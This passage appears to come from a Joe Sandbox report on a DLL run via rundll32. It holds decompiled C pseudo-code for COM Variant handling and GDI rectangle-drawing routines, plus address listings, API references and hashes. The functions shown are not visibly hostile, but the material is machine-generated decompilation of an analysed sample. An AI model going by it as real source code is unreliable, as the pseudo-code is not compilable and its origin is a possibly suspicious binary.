													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                        0x10039b2b
                                                                        0x10039b30
                                                                        0x10039b38
                                                                        0x10039b3b
                                                                        0x10039b41
                                                                        0x10039b45
                                                                        0x10039b48
                                                                        0x10039b55
                                                                        0x10039b5a
                                                                        0x10039b5d
                                                                        0x10039b62
                                                                        0x10039b70
                                                                        0x10039b64
                                                                        0x10039b65
                                                                        0x10039b6b
                                                                        0x10039b6b
                                                                        0x10039b77
                                                                        0x10039b7e
                                                                        0x10039b83
                                                                        0x10039b8a
                                                                        0x10039b8a
                                                                        0x10039b8f
                                                                        0x10039b9e
                                                                        0x10039ba9
                                                                        0x10039bac
                                                                        0x10039bb7
                                                                        0x10039bbd
                                                                        0x10039bc1
                                                                        0x10039bc4
                                                                        0x10039bc7
                                                                        0x10039bcd
                                                                        0x10039bd0
                                                                        0x10039bd3
                                                                        0x10039bd3
                                                                        0x10039bdb
                                                                        0x10039bde
                                                                        0x10039be1
                                                                        0x10039be2
                                                                        0x10039be5
                                                                        0x10039beb
                                                                        0x10039bee
                                                                        0x10039bf1
                                                                        0x10039bfb
                                                                        0x10039bfb
                                                                        0x10039bfe
                                                                        0x10039c06
                                                                        0x10039c08
                                                                        0x10039d38
                                                                        0x10039d3d
                                                                        0x10039d40
                                                                        0x10039d42
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d49
                                                                        0x10039d4c
                                                                        0x10039d4e
                                                                        0x10039d54
                                                                        0x10039d5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d42
                                                                        0x10039c0e
                                                                        0x10039c0e
                                                                        0x10039d60
                                                                        0x10039d60
                                                                        0x10039d63
                                                                        0x10039d63
                                                                        0x10039d65
                                                                        0x10039d67
                                                                        0x10039d67
                                                                        0x10039c14
                                                                        0x10039c15
                                                                        0x10039c19
                                                                        0x10039c1f
                                                                        0x00000000
                                                                        0x10039c26
                                                                        0x10039c29
                                                                        0x10039c2b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c54
                                                                        0x10039c58
                                                                        0x10039c5d
                                                                        0x10039c60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c67
                                                                        0x10039c6b
                                                                        0x10039c70
                                                                        0x10039c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c7a
                                                                        0x10039c7d
                                                                        0x10039c7d
                                                                        0x10039c7f
                                                                        0x10039c81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c90
                                                                        0x10039c93
                                                                        0x10039c95
                                                                        0x10039c97
                                                                        0x10039c98
                                                                        0x10039c9b
                                                                        0x10039ca1
                                                                        0x10039ca5
                                                                        0x10039ca7
                                                                        0x10039cad
                                                                        0x10039caf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039caf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d10
                                                                        0x10039d13
                                                                        0x10039d17
                                                                        0x10039d19
                                                                        0x10039c2e
                                                                        0x10039c2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039d20
                                                                        0x10039d24
                                                                        0x10039d27
                                                                        0x10039d2a
                                                                        0x10039d2c
                                                                        0x10039d2d
                                                                        0x10039d2e
                                                                        0x10039d2f
                                                                        0x10039d30
                                                                        0x10039d33
                                                                        0x10039d35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039cba
                                                                        0x10039cba
                                                                        0x10039cbd
                                                                        0x10039cbf
                                                                        0x10039cc1
                                                                        0x10039cc3
                                                                        0x10039cc6
                                                                        0x10039ccb
                                                                        0x10039cd1
                                                                        0x10039cd2
                                                                        0x10039cd5
                                                                        0x10039cd7
                                                                        0x10039cda
                                                                        0x10039cda
                                                                        0x10039ce2
                                                                        0x10039cee
                                                                        0x10039cee
                                                                        0x10039cf3
                                                                        0x10039cf4
                                                                        0x10039cfa
                                                                        0x10039cfe
                                                                        0x10039d00
                                                                        0x10039d02
                                                                        0x10039d04
                                                                        0x10039cb5
                                                                        0x10039cb5
                                                                        0x00000000
                                                                        0x10039cb5
                                                                        0x10039d04
                                                                        0x10039d06
                                                                        0x10039d09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c46
                                                                        0x10039c49
                                                                        0x10039c4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c36
                                                                        0x10039c39
                                                                        0x10039c3c
                                                                        0x10039c3e
                                                                        0x10039c41
                                                                        0x10039c83
                                                                        0x10039c83
                                                                        0x10039c88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039c1f
                                                                        0x10039c19
                                                                        0x10039c0e
                                                                        0x10039d69
                                                                        0x10039d69
                                                                        0x10039d6d
                                                                        0x10039d70
                                                                        0x10039d79
                                                                        0x10039d79
                                                                        0x10039d82
                                                                        0x10039d85
                                                                        0x10039d85
                                                                        0x10039bc7
                                                                        0x10039d8b
                                                                        0x10039d8d
                                                                        0x10039d96
                                                                        0x10039d98
                                                                        0x10039d98
                                                                        0x10039da2
                                                                        0x10039daa
                                                                        0x10039dac
                                                                        0x10039dd2
                                                                        0x10039dd5
                                                                        0x10039dda
                                                                        0x10039de5
                                                                        0x10039de9
                                                                        0x10039deb
                                                                        0x10039ded
                                                                        0x10039ded
                                                                        0x10039df1
                                                                        0x10039df8
                                                                        0x10039df8
                                                                        0x10039dfe
                                                                        0x10039e01
                                                                        0x10039e02
                                                                        0x10039e02
                                                                        0x10039ded
                                                                        0x10039deb
                                                                        0x10039e07
                                                                        0x10039e0a
                                                                        0x10039e14
                                                                        0x10039e15
                                                                        0x10039ecc
                                                                        0x10039ecc
                                                                        0x10039ecf
                                                                        0x10039ed2
                                                                        0x10039ed8
                                                                        0x10039edc
                                                                        0x10039ee0
                                                                        0x10039ee5
                                                                        0x10039eeb
                                                                        0x10039eed
                                                                        0x10039eef
                                                                        0x10039ef5
                                                                        0x10039efb
                                                                        0x00000000
                                                                        0x10039efb
                                                                        0x10039eef
                                                                        0x00000000
                                                                        0x10039edc
                                                                        0x10039e1b
                                                                        0x10039e1f
                                                                        0x10039e2c
                                                                        0x10039e36
                                                                        0x10039e39
                                                                        0x10039e3f
                                                                        0x10039e3f
                                                                        0x10039e44
                                                                        0x10039e49
                                                                        0x10039e4a
                                                                        0x10039e4d
                                                                        0x10039e4f
                                                                        0x10039e52
                                                                        0x10039e64
                                                                        0x10039e64
                                                                        0x10039e54
                                                                        0x10039e54
                                                                        0x10039e57
                                                                        0x10039e59
                                                                        0x10039e5a
                                                                        0x10039e60
                                                                        0x10039e60
                                                                        0x10039e66
                                                                        0x10039e6a
                                                                        0x10039e6d
                                                                        0x10039e73
                                                                        0x10039e78
                                                                        0x10039e78
                                                                        0x10039e7b
                                                                        0x10039e83
                                                                        0x10039e83
                                                                        0x10039e85
                                                                        0x10039e88
                                                                        0x10039e8d
                                                                        0x10039e8d
                                                                        0x10039e90
                                                                        0x10039e98
                                                                        0x10039e98
                                                                        0x10039e9a
                                                                        0x10039e9d
                                                                        0x10039ea2
                                                                        0x10039ea2
                                                                        0x10039ea5
                                                                        0x10039ead
                                                                        0x10039ead
                                                                        0x10039eb2
                                                                        0x10039eb8
                                                                        0x10039ec4
                                                                        0x10039ec7
                                                                        0x00000000
                                                                        0x10039e2e
                                                                        0x10039e2e
                                                                        0x10039efc
                                                                        0x10039efc
                                                                        0x10039f01
                                                                        0x10039f04
                                                                        0x10039f0a
                                                                        0x10039f0c
                                                                        0x00000000
                                                                        0x10039f1d
                                                                        0x10039f24
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f7f
                                                                        0x10039f82
                                                                        0x10039f85
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f3c
                                                                        0x10039f3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f46
                                                                        0x10039f49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f29
                                                                        0x10039f2c
                                                                        0x10039f2f
                                                                        0x10039f31
                                                                        0x10039f34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f53
                                                                        0x10039f58
                                                                        0x10039f5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f63
                                                                        0x10039f66
                                                                        0x10039f68
                                                                        0x10039f6c
                                                                        0x10039f6f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f73
                                                                        0x10039f76
                                                                        0x10039f79
                                                                        0x10039f7a
                                                                        0x10039f7b
                                                                        0x10039f7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f13
                                                                        0x10039f19
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039f0c
                                                                        0x10039f0a
                                                                        0x10039e2c
                                                                        0x10039e15
                                                                        0x10039f87
                                                                        0x10039f8d
                                                                        0x10039f98

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10039B2B
                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                        • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                        • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                        • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                        • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                        • String ID:
                                                                        • API String ID: 344392101-0
                                                                        • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                        • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                        • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}








                                                                        0x10033fd3
                                                                        0x10033fe5
                                                                        0x10033fe7
                                                                        0x10033fea
                                                                        0x10033fed
                                                                        0x10033ff0
                                                                        0x10033ff3
                                                                        0x10033ff6
                                                                        0x10033ff9
                                                                        0x10034002
                                                                        0x10034006
                                                                        0x10034012
                                                                        0x10034028
                                                                        0x10034036
                                                                        0x1003404a
                                                                        0x1003405d
                                                                        0x1003406f
                                                                        0x10034074
                                                                        0x10034077
                                                                        0x1003407e
                                                                        0x1003407e
                                                                        0x10034084
                                                                        0x10034089
                                                                        0x10034089
                                                                        0x1003408c
                                                                        0x1003408f
                                                                        0x10034092
                                                                        0x10034095
                                                                        0x1003409b
                                                                        0x1003409f
                                                                        0x100340b5
                                                                        0x100340c0
                                                                        0x100340cc
                                                                        0x100340e2
                                                                        0x100340f0
                                                                        0x100340fd
                                                                        0x1003410f
                                                                        0x10034120
                                                                        0x1003412c
                                                                        0x1003413e
                                                                        0x1003413e
                                                                        0x10034120
                                                                        0x10034155
                                                                        0x10034162
                                                                        0x1003416f
                                                                        0x10034182
                                                                        0x1003419b
                                                                        0x100341a2
                                                                        0x100341a2
                                                                        0x100341aa
                                                                        0x100341ad
                                                                        0x100341af
                                                                        0x100341af
                                                                        0x100341b5
                                                                        0x100341c2
                                                                        0x100341d5
                                                                        0x100341ee
                                                                        0x100341f3
                                                                        0x100341fa
                                                                        0x100341fa
                                                                        0x10034202
                                                                        0x1003420f
                                                                        0x10034213
                                                                        0x10034216
                                                                        0x1003421e
                                                                        0x10034222
                                                                        0x10034225
                                                                        0x1003422d
                                                                        0x10034231
                                                                        0x10034234
                                                                        0x1003423c
                                                                        0x1003423f
                                                                        0x10034242
                                                                        0x10034247
                                                                        0x1003424e
                                                                        0x10034251
                                                                        0x1003425c
                                                                        0x10034264

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10033FD3
                                                                          • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                        • CopyRect.USER32 ref: 10034012
                                                                        • InflateRect.USER32(?,?,?), ref: 10034028
                                                                        • IntersectRect.USER32 ref: 10034036
                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                          • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                        • CopyRect.USER32 ref: 100340CC
                                                                        • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                        • IntersectRect.USER32 ref: 100340F0
                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                          • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                        • String ID:
                                                                        • API String ID: 897514543-0
                                                                        • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                        • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                        • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
